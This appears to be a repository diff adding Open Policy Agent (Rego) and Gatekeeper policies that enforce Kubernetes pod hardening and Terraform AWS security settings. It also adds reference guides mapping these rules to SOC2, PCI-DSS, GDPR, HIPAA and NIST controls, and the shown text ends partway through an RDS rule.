allowHostNamespace:
type: boolean
description: "Allow host namespace usage"
allowedCapabilities:
type: array
description: "List of allowed capabilities"
items:
type: string
targets:
- target: admission.k8s.gatekeeper.sh
rego: |
package k8spodsecurity
import future.keywords.contains
import future.keywords.if
violation[{"msg": msg}] {
not input.parameters.allowPrivileged
container := input.review.object.spec.containers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged container not allowed: %v", [container.name])
}
violation[{"msg": msg}] {
container := input.review.object.spec.containers[_]
not container.securityContext.runAsNonRoot
msg := sprintf("Container must run as non-root: %v", [container.name])
}
violation[{"msg": msg}] {
container := input.review.object.spec.containers[_]
not container.securityContext.readOnlyRootFilesystem
msg := sprintf("Container must use read-only root filesystem: %v", [container.name])
}
violation[{"msg": msg}] {
not input.parameters.allowHostNamespace
input.review.object.spec.hostPID == true
msg := "Host PID namespace not allowed"
}
violation[{"msg": msg}] {
not input.parameters.allowHostNamespace
input.review.object.spec.hostIPC == true
msg := "Host IPC namespace not allowed"
}
violation[{"msg": msg}] {
not input.parameters.allowHostNamespace
input.review.object.spec.hostNetwork == true
msg := "Host network namespace not allowed"
}
violation[{"msg": msg}] {
volume := input.review.object.spec.volumes[_]
volume.hostPath
msg := sprintf("hostPath volume not allowed: %v", [volume.name])
}
violation[{"msg": msg}] {
container := input.review.object.spec.containers[_]
capability := container.securityContext.capabilities.add[_]
not is_allowed_capability(capability)
msg := sprintf("Capability %v not allowed for container: %v", [capability, container.name])
}
is_allowed_capability(capability) {
input.parameters.allowedCapabilities[_] == capability
}

View File

@@ -0,0 +1,20 @@
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPodSecurity
metadata:
name: pod-security-policy
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
namespaces:
- "production"
- "staging"
excludedNamespaces:
- "kube-system"
- "gatekeeper-system"
parameters:
allowPrivileged: false
allowHostNamespace: false
allowedCapabilities:
- "NET_BIND_SERVICE" # Allow binding to privileged ports

View File

@@ -0,0 +1,90 @@
package kubernetes.admission
import future.keywords.contains
import future.keywords.if
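# Input: a Kubernetes AdmissionReview request as delivered to a validating
# admission webhook; rules inspect input.request.object (the Pod manifest).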
# Deny privileged containers
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged container is not allowed: %v", [container.name])
}
# Enforce non-root user
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.securityContext.runAsNonRoot
msg := sprintf("Container must run as non-root user: %v", [container.name])
}
# Require read-only root filesystem
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.securityContext.readOnlyRootFilesystem
msg := sprintf("Container must use read-only root filesystem: %v", [container.name])
}
# Deny host namespaces
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostPID == true
msg := "Sharing the host PID namespace is not allowed"
}
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostIPC == true
msg := "Sharing the host IPC namespace is not allowed"
}
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostNetwork == true
msg := "Sharing the host network namespace is not allowed"
}
# Deny hostPath volumes
deny[msg] {
input.request.kind.kind == "Pod"
volume := input.request.object.spec.volumes[_]
volume.hostPath
msg := sprintf("hostPath volumes are not allowed: %v", [volume.name])
}
# Require dropping ALL capabilities
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not drops_all_capabilities(container)
msg := sprintf("Container must drop ALL capabilities: %v", [container.name])
}
drops_all_capabilities(container) {
container.securityContext.capabilities.drop[_] == "ALL"
}
# Deny dangerous capabilities
# Note: Kubernetes capability names omit the CAP_ prefix (e.g. SYS_ADMIN)
dangerous_capabilities := [
"SYS_ADMIN",
"NET_ADMIN",
"SYS_PTRACE",
"SYS_MODULE",
]
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
capability := container.securityContext.capabilities.add[_]
dangerous_capabilities[_] == capability
msg := sprintf("Capability %v is not allowed for container: %v", [capability, container.name])
}
# Require seccomp profile
deny[msg] {
input.request.kind.kind == "Pod"
not input.request.object.spec.securityContext.seccompProfile
msg := "Pod must define a seccomp profile"
}

View File

@@ -0,0 +1,131 @@
package compliance.pci
import future.keywords.if
# PCI-DSS Requirement 1.2: Firewall Configuration
# Require network policies for cardholder data
deny[msg] {
input.kind == "Namespace"
input.metadata.labels["pci.scope"] == "in-scope"
not input.metadata.annotations["network-policy.enabled"] == "true"
msg := {
"control": "PCI-DSS 1.2",
"severity": "high",
"violation": sprintf("PCI in-scope namespace requires network policy: %v", [input.metadata.name]),
"remediation": "Create NetworkPolicy to restrict traffic and add annotation",
}
}
# PCI-DSS Requirement 2.2: System Hardening
# Container hardening - read-only filesystem
deny[msg] {
input.kind == "Pod"
input.metadata.labels["pci.scope"] == "in-scope"
container := input.spec.containers[_]
not container.securityContext.readOnlyRootFilesystem
msg := {
"control": "PCI-DSS 2.2",
"severity": "high",
"violation": sprintf("PCI container requires read-only filesystem: %v", [container.name]),
"remediation": "Set securityContext.readOnlyRootFilesystem: true",
}
}
# Container hardening - no privilege escalation
deny[msg] {
input.kind == "Pod"
input.metadata.labels["pci.scope"] == "in-scope"
container := input.spec.containers[_]
not container.securityContext.allowPrivilegeEscalation == false
msg := {
"control": "PCI-DSS 2.2",
"severity": "high",
"violation": sprintf("PCI container allows privilege escalation: %v", [container.name]),
"remediation": "Set securityContext.allowPrivilegeEscalation: false",
}
}
# PCI-DSS Requirement 3.4: Encryption of Cardholder Data
# Require encryption for PCI data at rest
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["pci.scope"] == "in-scope"
not input.metadata.annotations["volume.encryption.enabled"] == "true"
msg := {
"control": "PCI-DSS 3.4",
"severity": "critical",
"violation": sprintf("PCI volume requires encryption: %v", [input.metadata.name]),
"remediation": "Enable volume encryption",
}
}
# Require TLS for PCI data in transit
deny[msg] {
input.kind == "Service"
input.metadata.labels["pci.scope"] == "in-scope"
not input.metadata.annotations["tls.enabled"] == "true"
msg := {
"control": "PCI-DSS 4.1",
"severity": "critical",
"violation": sprintf("PCI service requires TLS encryption: %v", [input.metadata.name]),
"remediation": "Enable TLS for data in transit",
}
}
# PCI-DSS Requirement 8.2.1: Strong Authentication
# Require MFA for payment endpoints
deny[msg] {
input.kind == "Ingress"
input.metadata.labels["payment.enabled"] == "true"
not input.metadata.annotations["mfa.required"] == "true"
msg := {
"control": "PCI-DSS 8.2.1",
"severity": "high",
"violation": sprintf("Payment ingress requires MFA: %v", [input.metadata.name]),
"remediation": "Enable MFA via annotation: mfa.required=true",
}
}
# PCI-DSS Requirement 10.2: Audit Logging
# Require audit logging for PCI components
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["pci.scope"] == "in-scope"
not has_audit_logging(input)
msg := {
"control": "PCI-DSS 10.2",
"severity": "high",
"violation": sprintf("PCI deployment requires audit logging: %v", [input.metadata.name]),
"remediation": "Deploy audit logging sidecar or enable centralized logging",
}
}
has_audit_logging(resource) {
resource.spec.template.metadata.annotations["audit.enabled"] == "true"
}
has_audit_logging(resource) {
container := resource.spec.template.spec.containers[_]
contains(container.name, "audit")
}
# PCI-DSS Requirement 11.3: Penetration Testing
# Require security testing evidence for PCI deployments
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["pci.scope"] == "in-scope"
input.metadata.namespace == "production"
not input.metadata.annotations["security-testing.date"]
msg := {
"control": "PCI-DSS 11.3",
"severity": "medium",
"violation": sprintf("PCI deployment requires security testing evidence: %v", [input.metadata.name]),
"remediation": "Add annotation: security-testing.date=YYYY-MM-DD",
}
}

View File

@@ -0,0 +1,107 @@
package compliance.soc2
import future.keywords.if
# SOC2 CC6.1: Logical and Physical Access Controls
# Deny overly permissive RBAC
deny[msg] {
input.kind == "RoleBinding"
input.roleRef.name == "cluster-admin"
not startswith(input.subjects[_].name, "system:")
msg := {
"control": "SOC2 CC6.1",
"severity": "high",
"violation": sprintf("Overly permissive cluster-admin binding: %v", [input.metadata.name]),
"remediation": "Use least-privilege roles instead of cluster-admin",
}
}
# Require authentication for external services
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not input.metadata.annotations["auth.required"] == "true"
msg := {
"control": "SOC2 CC6.1",
"severity": "medium",
"violation": sprintf("External service without authentication: %v", [input.metadata.name]),
"remediation": "Add annotation: auth.required=true",
}
}
# SOC2 CC6.6: Encryption in Transit
# Require TLS for Ingress
deny[msg] {
input.kind == "Ingress"
not input.spec.tls
msg := {
"control": "SOC2 CC6.6",
"severity": "high",
"violation": sprintf("Ingress without TLS: %v", [input.metadata.name]),
"remediation": "Configure spec.tls with valid certificates",
}
}
# Require TLS for LoadBalancer
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not input.metadata.annotations["service.beta.kubernetes.io/aws-load-balancer-ssl-cert"]
msg := {
"control": "SOC2 CC6.6",
"severity": "high",
"violation": sprintf("LoadBalancer without SSL/TLS: %v", [input.metadata.name]),
"remediation": "Add SSL certificate annotation",
}
}
# SOC2 CC6.7: Encryption at Rest
# Require encrypted volumes for confidential data
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-classification"] == "confidential"
not input.metadata.annotations["volume.beta.kubernetes.io/storage-encrypted"] == "true"
msg := {
"control": "SOC2 CC6.7",
"severity": "high",
"violation": sprintf("Unencrypted volume for confidential data: %v", [input.metadata.name]),
"remediation": "Enable volume encryption annotation",
}
}
# SOC2 CC7.2: System Monitoring
# Require audit logging for critical systems
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["critical-system"] == "true"
not has_audit_logging(input)
msg := {
"control": "SOC2 CC7.2",
"severity": "medium",
"violation": sprintf("Critical system without audit logging: %v", [input.metadata.name]),
"remediation": "Enable audit logging via sidecar or annotations",
}
}
has_audit_logging(resource) {
resource.spec.template.metadata.annotations["audit.enabled"] == "true"
}
# SOC2 CC8.1: Change Management
# Require approval for production changes
deny[msg] {
input.kind == "Deployment"
input.metadata.namespace == "production"
not input.metadata.annotations["change-request.id"]
msg := {
"control": "SOC2 CC8.1",
"severity": "medium",
"violation": sprintf("Production deployment without change request: %v", [input.metadata.name]),
"remediation": "Add annotation: change-request.id=CR-XXXX",
}
}

View File

@@ -0,0 +1,223 @@
package terraform.security
import future.keywords.if
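# Input: Terraform plan JSON produced with
#   terraform plan -out=tfplan.binary && terraform show -json tfplan.binary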
# AWS S3 Bucket Security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not has_encryption(resource)
msg := {
"resource": resource.name,
"type": "aws_s3_bucket",
"severity": "high",
"violation": "S3 bucket must have encryption enabled",
"remediation": "Add server_side_encryption_configuration block",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not has_versioning(resource)
msg := {
"resource": resource.name,
"type": "aws_s3_bucket",
"severity": "medium",
"violation": "S3 bucket should have versioning enabled",
"remediation": "Add versioning configuration with enabled = true",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket_public_access_block"
resource.change.after.block_public_acls == false
msg := {
"resource": resource.name,
"type": "aws_s3_bucket_public_access_block",
"severity": "high",
"violation": "S3 bucket must block public ACLs",
"remediation": "Set block_public_acls = true",
}
}
has_encryption(resource) {
resource.change.after.server_side_encryption_configuration
}
has_versioning(resource) {
resource.change.after.versioning[_].enabled == true
}
# AWS EC2 Security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_instance"
# metadata_options is rendered as a list of one block in the plan JSON
not resource.change.after.metadata_options[_].http_tokens == "required"
msg := {
"resource": resource.name,
"type": "aws_instance",
"severity": "high",
"violation": "EC2 instance must use IMDSv2",
"remediation": "Set metadata_options.http_tokens = required",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_instance"
resource.change.after.associate_public_ip_address == true
is_production
msg := {
"resource": resource.name,
"type": "aws_instance",
"severity": "high",
"violation": "Production EC2 instances cannot have public IPs",
"remediation": "Set associate_public_ip_address = false",
}
}
# In the plan JSON, variable values are nested under .value
is_production {
input.variables.environment.value == "production"
}
# AWS RDS Security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
not resource.change.after.storage_encrypted
msg := {
"resource": resource.name,
"type": "aws_db_instance",
"severity": "high",
"violation": "RDS instance must have encryption enabled",
"remediation": "Set storage_encrypted = true",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
resource.change.after.publicly_accessible == true
msg := {
"resource": resource.name,
"type": "aws_db_instance",
"severity": "critical",
"violation": "RDS instance cannot be publicly accessible",
"remediation": "Set publicly_accessible = false",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
backup_retention := resource.change.after.backup_retention_period
backup_retention < 7
msg := {
"resource": resource.name,
"type": "aws_db_instance",
"severity": "medium",
"violation": "RDS instance must have at least 7 days backup retention",
"remediation": "Set backup_retention_period >= 7",
}
}
# AWS IAM Security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_iam_policy"
# the policy attribute is a JSON-encoded string in the plan, so parse it first
policy_doc := json.unmarshal(resource.change.after.policy)
statement := policy_doc.Statement[_]
statement.Action[_] == "*"
msg := {
"resource": resource.name,
"type": "aws_iam_policy",
"severity": "high",
"violation": "IAM policy cannot use wildcard actions",
"remediation": "Specify explicit actions instead of *",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_iam_policy"
policy_doc := json.unmarshal(resource.change.after.policy)
statement := policy_doc.Statement[_]
statement.Resource[_] == "*"
statement.Effect == "Allow"
msg := {
"resource": resource.name,
"type": "aws_iam_policy",
"severity": "high",
"violation": "IAM policy cannot use wildcard resources with Allow",
"remediation": "Specify explicit resource ARNs",
}
}
# AWS Security Group Rules
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_security_group_rule"
resource.change.after.type == "ingress"
resource.change.after.from_port == 22
is_open_to_internet(resource.change.after.cidr_blocks)
msg := {
"resource": resource.name,
"type": "aws_security_group_rule",
"severity": "critical",
"violation": "Security group allows SSH from internet",
"remediation": "Restrict SSH access to specific IP ranges",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_security_group_rule"
resource.change.after.type == "ingress"
resource.change.after.from_port == 3389
is_open_to_internet(resource.change.after.cidr_blocks)
msg := {
"resource": resource.name,
"type": "aws_security_group_rule",
"severity": "critical",
"violation": "Security group allows RDP from internet",
"remediation": "Restrict RDP access to specific IP ranges",
}
}
is_open_to_internet(cidr_blocks) {
cidr_blocks[_] == "0.0.0.0/0"
}
# AWS KMS Security
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_kms_key"
not resource.change.after.enable_key_rotation
msg := {
"resource": resource.name,
"type": "aws_kms_key",
"severity": "medium",
"violation": "KMS key must have automatic rotation enabled",
"remediation": "Set enable_key_rotation = true",
}
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_kms_key"
deletion_window := resource.change.after.deletion_window_in_days
deletion_window < 30
msg := {
"resource": resource.name,
"type": "aws_kms_key",
"severity": "medium",
"violation": "KMS key deletion window must be at least 30 days",
"remediation": "Set deletion_window_in_days >= 30",
}
}

View File

@@ -0,0 +1,40 @@
# Reference Document Template
This file contains detailed reference material that Claude should load only when needed.
## Table of Contents
- [Section 1](#section-1)
- [Section 2](#section-2)
- [Security Standards](#security-standards)
## Section 1
Detailed information, schemas, or examples that are too large for SKILL.md.
## Section 2
Additional reference material.
## Security Standards
### OWASP Top 10
Reference relevant OWASP categories:
- A01: Broken Access Control
- A02: Cryptographic Failures
- etc.
### CWE Mappings
Map to relevant Common Weakness Enumeration categories:
- CWE-79: Cross-site Scripting
- CWE-89: SQL Injection
- etc.
### MITRE ATT&CK
Reference relevant tactics and techniques if applicable:
- TA0001: Initial Access
- T1190: Exploit Public-Facing Application
- etc.

View File

@@ -0,0 +1,507 @@
# Compliance Framework Policy Templates
Policy templates mapped to specific compliance framework controls for SOC2, PCI-DSS, GDPR, HIPAA, and NIST.
## Table of Contents
- [SOC2 Trust Services Criteria](#soc2-trust-services-criteria)
- [PCI-DSS Requirements](#pci-dss-requirements)
- [GDPR Data Protection](#gdpr-data-protection)
- [HIPAA Security Rules](#hipaa-security-rules)
- [NIST Cybersecurity Framework](#nist-cybersecurity-framework)
## SOC2 Trust Services Criteria
### CC6.1: Logical and Physical Access Controls
**Control**: The entity implements logical access security software, infrastructure, and architectures over protected information assets to protect them from security events.
```rego
package compliance.soc2.cc6_1
# Deny overly permissive RBAC
deny[msg] {
input.kind == "RoleBinding"
input.roleRef.name == "cluster-admin"
not startswith(input.subjects[_].name, "system:")
msg := {
"control": "SOC2 CC6.1",
"violation": sprintf("Overly permissive cluster-admin binding: %v", [input.metadata.name]),
"remediation": "Use least-privilege roles instead of cluster-admin"
}
}
# Require authentication for external services
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not input.metadata.annotations["auth.required"] == "true"
msg := {
"control": "SOC2 CC6.1",
"violation": sprintf("External service without authentication: %v", [input.metadata.name]),
"remediation": "Add auth.required=true annotation"
}
}
# Require MFA for admin access
deny[msg] {
input.kind == "RoleBinding"
contains(input.roleRef.name, "admin")
not input.metadata.annotations["mfa.required"] == "true"
msg := {
"control": "SOC2 CC6.1",
"violation": sprintf("Admin role without MFA requirement: %v", [input.metadata.name]),
"remediation": "Add mfa.required=true annotation"
}
}
```
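One way to check a rendered manifest against this control locally (resource and file names are illustrative):
```bash
kubectl get rolebinding my-binding -o json > rolebinding.json
opa eval --data soc2_cc6_1.rego --input rolebinding.json \
  --format pretty 'data.compliance.soc2.cc6_1.deny'
```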
### CC6.6: Encryption in Transit
**Control**: The entity protects information transmitted to external parties during transmission.
```rego
package compliance.soc2.cc6_6
# Require TLS for external services
deny[msg] {
input.kind == "Ingress"
not input.spec.tls
msg := {
"control": "SOC2 CC6.6",
"violation": sprintf("Ingress without TLS: %v", [input.metadata.name]),
"remediation": "Configure spec.tls with valid certificates"
}
}
# Require TLS for LoadBalancer services
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not input.metadata.annotations["service.beta.kubernetes.io/aws-load-balancer-ssl-cert"]
msg := {
"control": "SOC2 CC6.6",
"violation": sprintf("LoadBalancer without SSL/TLS: %v", [input.metadata.name]),
"remediation": "Add SSL certificate annotation"
}
}
```
### CC6.7: Encryption at Rest
**Control**: The entity protects information at rest.
```rego
package compliance.soc2.cc6_7
# Require encrypted volumes
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-classification"] == "confidential"
not input.metadata.annotations["volume.beta.kubernetes.io/storage-encrypted"] == "true"
msg := {
"control": "SOC2 CC6.7",
"violation": sprintf("Unencrypted volume for confidential data: %v", [input.metadata.name]),
"remediation": "Enable volume encryption annotation"
}
}
```
### CC7.2: System Monitoring
**Control**: The entity monitors system components and the operation of those components for anomalies.
```rego
package compliance.soc2.cc7_2
# Require audit logging
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["critical-system"] == "true"
not has_audit_logging(input)
msg := {
"control": "SOC2 CC7.2",
"violation": sprintf("Critical system without audit logging: %v", [input.metadata.name]),
"remediation": "Enable audit logging via sidecar or annotations"
}
}
has_audit_logging(resource) {
resource.spec.template.metadata.annotations["audit.enabled"] == "true"
}
```
## PCI-DSS Requirements
### Requirement 1.2: Firewall Configuration
**Control**: Build firewall and router configurations that restrict connections between untrusted networks.
```rego
package compliance.pci.req1_2
# Require network policies for cardholder data
deny[msg] {
input.kind == "Namespace"
input.metadata.labels["pci.scope"] == "in-scope"
not has_network_policy(input.metadata.name)
msg := {
"control": "PCI-DSS 1.2",
"violation": sprintf("PCI in-scope namespace without network policy: %v", [input.metadata.name]),
"remediation": "Create NetworkPolicy to restrict traffic"
}
}
has_network_policy(namespace) {
# Check if NetworkPolicy exists in data (requires external data)
data.network_policies[namespace]
}
```
### Requirement 2.2: System Hardening
**Control**: Develop configuration standards for all system components.
```rego
package compliance.pci.req2_2
# Container hardening requirements
deny[msg] {
input.kind == "Pod"
input.metadata.labels["pci.scope"] == "in-scope"
container := input.spec.containers[_]
not container.securityContext.readOnlyRootFilesystem
msg := {
"control": "PCI-DSS 2.2",
"violation": sprintf("PCI container without read-only filesystem: %v", [container.name]),
"remediation": "Set securityContext.readOnlyRootFilesystem: true"
}
}
deny[msg] {
input.kind == "Pod"
input.metadata.labels["pci.scope"] == "in-scope"
container := input.spec.containers[_]
not container.securityContext.allowPrivilegeEscalation == false
msg := {
"control": "PCI-DSS 2.2",
"violation": sprintf("PCI container allows privilege escalation: %v", [container.name]),
"remediation": "Set securityContext.allowPrivilegeEscalation: false"
}
}
```
### Requirement 8.2.1: Strong Authentication
**Control**: Render all authentication credentials unreadable during transmission and storage.
```rego
package compliance.pci.req8_2_1
# Require MFA for payment endpoints
deny[msg] {
input.kind == "Ingress"
input.metadata.labels["payment.enabled"] == "true"
not input.metadata.annotations["mfa.required"] == "true"
msg := {
"control": "PCI-DSS 8.2.1",
"violation": sprintf("Payment ingress without MFA: %v", [input.metadata.name]),
"remediation": "Enable MFA via annotation: mfa.required=true"
}
}
# Password strength requirements
deny[msg] {
input.kind == "ConfigMap"
input.metadata.name == "auth-config"
to_number(input.data["password.minLength"]) < 12
msg := {
"control": "PCI-DSS 8.2.1",
"violation": "Password minimum length below requirement",
"remediation": "Set password.minLength to at least 12"
}
}
```
### Requirement 10.2: Audit Logging
**Control**: Implement automated audit trails for all system components.
```rego
package compliance.pci.req10_2
# Require audit logging for PCI components
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["pci.scope"] == "in-scope"
not has_audit_sidecar(input)
msg := {
"control": "PCI-DSS 10.2",
"violation": sprintf("PCI deployment without audit logging: %v", [input.metadata.name]),
"remediation": "Deploy audit logging sidecar"
}
}
has_audit_sidecar(resource) {
container := resource.spec.template.spec.containers[_]
contains(container.name, "audit")
}
```
## GDPR Data Protection
### Article 25: Data Protection by Design
**Control**: The controller shall implement appropriate technical and organizational measures.
```rego
package compliance.gdpr.art25
# Require data classification labels
deny[msg] {
input.kind == "Deployment"
processes_personal_data(input)
not input.metadata.labels["data-classification"]
msg := {
"control": "GDPR Article 25",
"violation": sprintf("Deployment processing personal data without classification: %v", [input.metadata.name]),
"remediation": "Add data-classification label"
}
}
# Data minimization - limit replicas for personal data
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["data-type"] == "personal"
input.spec.replicas > 3
not input.metadata.annotations["gdpr.justification"]
msg := {
"control": "GDPR Article 25",
"violation": sprintf("Excessive replicas for personal data: %v", [input.metadata.name]),
"remediation": "Reduce replicas or add justification annotation"
}
}
processes_personal_data(resource) {
resource.metadata.labels["data-type"] == "personal"
}
processes_personal_data(resource) {
contains(lower(resource.metadata.name), "user")
}
```
### Article 32: Security of Processing
**Control**: Implement appropriate technical and organizational measures to ensure a level of security appropriate to the risk.
```rego
package compliance.gdpr.art32
# Require encryption for personal data
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-type"] == "personal"
not input.metadata.annotations["volume.encryption.enabled"] == "true"
msg := {
"control": "GDPR Article 32",
"violation": sprintf("Personal data volume without encryption: %v", [input.metadata.name]),
"remediation": "Enable volume encryption"
}
}
# Require TLS for personal data services
deny[msg] {
input.kind == "Service"
input.metadata.labels["data-type"] == "personal"
not input.metadata.annotations["tls.enabled"] == "true"
msg := {
"control": "GDPR Article 32",
"violation": sprintf("Personal data service without TLS: %v", [input.metadata.name]),
"remediation": "Enable TLS encryption"
}
}
```
## HIPAA Security Rules
### 164.308: Administrative Safeguards
**Control**: Implement policies and procedures to prevent, detect, contain, and correct security violations.
```rego
package compliance.hipaa.admin
# Require access control policies
deny[msg] {
input.kind == "Namespace"
input.metadata.labels["phi-data"] == "true"
not input.metadata.annotations["access-control.policy"]
msg := {
"control": "HIPAA 164.308",
"violation": sprintf("PHI namespace without access control policy: %v", [input.metadata.name]),
"remediation": "Document access control policy in annotation"
}
}
```
### 164.312: Technical Safeguards
**Control**: Implement technical policies and procedures for electronic information systems.
```rego
package compliance.hipaa.technical
# Encryption in transit for PHI
deny[msg] {
input.kind == "Service"
input.metadata.labels["phi-data"] == "true"
not input.metadata.annotations["tls.enabled"] == "true"
msg := {
"control": "HIPAA 164.312",
"violation": sprintf("PHI service without TLS: %v", [input.metadata.name]),
"remediation": "Enable TLS for data in transit"
}
}
# Audit logging for PHI access
deny[msg] {
input.kind == "Deployment"
input.metadata.labels["phi-data"] == "true"
not has_audit_logging(input)
msg := {
"control": "HIPAA 164.312",
"violation": sprintf("PHI deployment without audit logging: %v", [input.metadata.name]),
"remediation": "Enable audit logging for all PHI access"
}
}
has_audit_logging(resource) {
resource.spec.template.metadata.annotations["audit.enabled"] == "true"
}
# Authentication controls
deny[msg] {
input.kind == "Ingress"
input.metadata.labels["phi-data"] == "true"
not input.metadata.annotations["auth.method"]
msg := {
"control": "HIPAA 164.312",
"violation": sprintf("PHI ingress without authentication: %v", [input.metadata.name]),
"remediation": "Configure authentication method"
}
}
```
## NIST Cybersecurity Framework
### PR.AC-4: Access Control
**Control**: Access permissions and authorizations are managed, incorporating the principles of least privilege and separation of duties.
```rego
package compliance.nist.pr_ac_4
# Least privilege - no wildcard permissions
deny[msg] {
input.kind == "Role"
rule := input.rules[_]
rule.verbs[_] == "*"
msg := {
"control": "NIST PR.AC-4",
"violation": sprintf("Wildcard permissions in role: %v", [input.metadata.name]),
"remediation": "Specify explicit verb permissions"
}
}
deny[msg] {
input.kind == "Role"
rule := input.rules[_]
rule.resources[_] == "*"
msg := {
"control": "NIST PR.AC-4",
"violation": sprintf("Wildcard resources in role: %v", [input.metadata.name]),
"remediation": "Specify explicit resource permissions"
}
}
```
### PR.DS-1: Data-at-Rest Protection
**Control**: Data-at-rest is protected.
```rego
package compliance.nist.pr_ds_1
# Require encryption for sensitive data
deny[msg] {
input.kind == "PersistentVolumeClaim"
input.metadata.labels["data-sensitivity"] == "high"
not input.metadata.annotations["volume.encryption"] == "enabled"
msg := {
"control": "NIST PR.DS-1",
"violation": sprintf("Sensitive data volume without encryption: %v", [input.metadata.name]),
"remediation": "Enable volume encryption for data-at-rest protection"
}
}
```
### PR.DS-2: Data-in-Transit Protection
**Control**: Data-in-transit is protected.
```rego
package compliance.nist.pr_ds_2
# Require TLS for external traffic
deny[msg] {
input.kind == "Ingress"
not input.spec.tls
msg := {
"control": "NIST PR.DS-2",
"violation": sprintf("Ingress without TLS: %v", [input.metadata.name]),
"remediation": "Configure TLS for data-in-transit protection"
}
}
```
## Multi-Framework Compliance
Example policy that maps to multiple frameworks:
```rego
package compliance.multi_framework
# Encryption requirement - maps to multiple frameworks
deny[msg] {
input.kind == "Service"
input.spec.type == "LoadBalancer"
not has_tls_encryption(input)
msg := {
"violation": sprintf("External service without TLS encryption: %v", [input.metadata.name]),
"remediation": "Enable TLS/SSL for external services",
"frameworks": {
"SOC2": "CC6.6 - Encryption in Transit",
"PCI-DSS": "4.1 - Use strong cryptography",
"GDPR": "Article 32 - Security of Processing",
"HIPAA": "164.312 - Technical Safeguards",
"NIST": "PR.DS-2 - Data-in-Transit Protection"
}
}
}
has_tls_encryption(service) {
service.metadata.annotations["service.beta.kubernetes.io/aws-load-balancer-ssl-cert"]
}
```
## References
- [SOC2 Trust Services Criteria](https://www.aicpa.org/interestareas/frc/assuranceadvisoryservices/aicpasoc2report.html)
- [PCI-DSS Requirements](https://www.pcisecuritystandards.org/document_library)
- [GDPR Official Text](https://gdpr.eu/)
- [HIPAA Security Rule](https://www.hhs.gov/hipaa/for-professionals/security/index.html)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)

View File

@@ -0,0 +1,623 @@
# Infrastructure-as-Code Security Policies
OPA policies for validating infrastructure-as-code configurations in Terraform, CloudFormation, and other IaC tools.
## Table of Contents
- [Terraform Policies](#terraform-policies)
- [AWS CloudFormation](#aws-cloudformation)
- [Azure ARM Templates](#azure-arm-templates)
- [GCP Deployment Manager](#gcp-deployment-manager)
## Terraform Policies
### S3 Bucket Security
```rego
package terraform.aws.s3
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not has_encryption(resource)
msg := sprintf("S3 bucket must have encryption enabled: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not has_versioning(resource)
msg := sprintf("S3 bucket must have versioning enabled: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket_public_access_block"
resource.change.after.block_public_acls == false
msg := sprintf("S3 bucket must block public ACLs: %v", [resource.name])
}
has_encryption(resource) {
resource.change.after.server_side_encryption_configuration
}
has_versioning(resource) {
resource.change.after.versioning[_].enabled == true
}
```
### EC2 Instance Security
```rego
package terraform.aws.ec2
# Deny instances without IMDSv2
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_instance"
not resource.change.after.metadata_options[_].http_tokens == "required"
msg := sprintf("EC2 instance must use IMDSv2: %v", [resource.name])
}
# Deny instances with public IPs in production
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_instance"
resource.change.after.associate_public_ip_address == true
is_production_environment
msg := sprintf("Production EC2 instances cannot have public IPs: %v", [resource.name])
}
# Require monitoring
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_instance"
resource.change.after.monitoring != true
msg := sprintf("EC2 instance must have detailed monitoring enabled: %v", [resource.name])
}
# In the plan JSON, variable values are nested under .value
is_production_environment {
input.variables.environment.value == "production"
}
```
### RDS Database Security
```rego
package terraform.aws.rds
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
not resource.change.after.storage_encrypted
